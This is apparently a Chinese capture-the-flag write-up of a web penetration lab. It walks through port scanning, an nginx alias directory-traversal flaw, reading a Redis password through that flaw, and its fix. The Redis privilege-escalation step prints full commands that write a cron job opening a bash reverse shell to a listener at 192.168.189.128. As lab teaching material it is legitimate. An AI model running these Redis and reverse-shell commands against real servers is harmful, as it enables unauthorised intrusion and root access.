记一次web渗透做题思路解析

描述:你是一名网络安全服务工程师,现在需要你对A集团网站进行安全防护,找出其中的漏洞点。

1、对目标服务器进行信息搜集,将web站点监听的端口号和版本信息作为flag值提交,提交格式:flag{端口+版本};

由于不知道服务器的IP,扫一下

找的web站点,所以是8081端口发现为nginx服务。

2、对目标服务器进行渗透测试,将触发漏洞的关键手段作为flag值提交,提交格式:flag{*****};

先看看服务器的web有什么东西

发现没有什么,爆破一下目录试试

返回上级,发现目录穿越漏洞,这里的触发漏洞的关键手段就是/images,,.

3、对目标服务器进行渗透测试,发现目标存在数据库服务,将该数据库服务的登录密码作为flag值提交,提交格式:flag{******};

扫描端口时可以看到有一个6379端口,根据信息看的出是redis数据库

这里直接利用目录穿越漏洞得知密码

4、对目标服务器进行渗透测试,将root家目录中的flag文件内容提交,提交格式:flag{******};

设置监听端口

使用密码连接目标redis服务并尝试计划任务提权

bash 复制代码
redis-cli -h target_ip -p server_port -a redis_password
bash 复制代码
config set dir /var/spool/cron
bash 复制代码
config set dbfilename root
bash 复制代码
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.189.128/4545 0>&1\n\n"
bash 复制代码
save

服务器上线

5、对目标服务器进行渗透测试,对目标web服务存在的漏洞点进行修复,将修复时所添加的内容进行md5加密后作为flag值提交,提交格式:flag{******};

通过"images.../"访问时会被替换为别名images/.../导致目录穿越,所以只需要在location指定的别名最后添加一个斜杆即可

加密一下即可

相关推荐
科技小登6 小时前
零信任与远程办公安全方案对比:身份认证、权限最小化与访问审计的选型测评
安全
wangbing11257 小时前
开发指南148-WebSocket-前端查报文
网络·websocket·网络协议
ESDWAN7 小时前
企业跨境网络合规建设指南:从线路选择到数据出境的全流程方案
网络·架构
事圆则缓7 小时前
Kotlin 入门与面试:从空安全、扩展函数到协程
安全·面试·kotlin
wuyk5557 小时前
《WiFi 嵌入式物联网开发全套实战》| 第 30 章 WiFi 抗干扰、抗闪断、网络抖动过滤量产策略
网络
不会就选b7 小时前
Linux之TCP<2>
linux·网络·tcp/ip
沫璃染墨8 小时前
《从零入门Linux系统篇(五十八):线程篇·十一——线程安全与死锁详解:从可重入到多锁管理》
linux·服务器·开发语言·c++·驱动开发·安全·架构
Flynt8 小时前
800KB 的 JSON 吃掉 8.5 秒 CPU:jackson 这波修复里,最容易被漏掉的洞藏在字符串里
java·安全
赛博守夜人9 小时前
跨境业务与出海合规之六:跨境数据出境与《个保法》/GDPR 冲突下的数据安全架构,技术隔离与加密信道实践
安全·安全架构
EatFan9 小时前
「失控AI智能体」首遭FTC立案:英伟达Agent安全体系落地,AI智能体合规设计如何前置
大数据·人工智能·安全·ai智能体·mcp·agent安全·ftc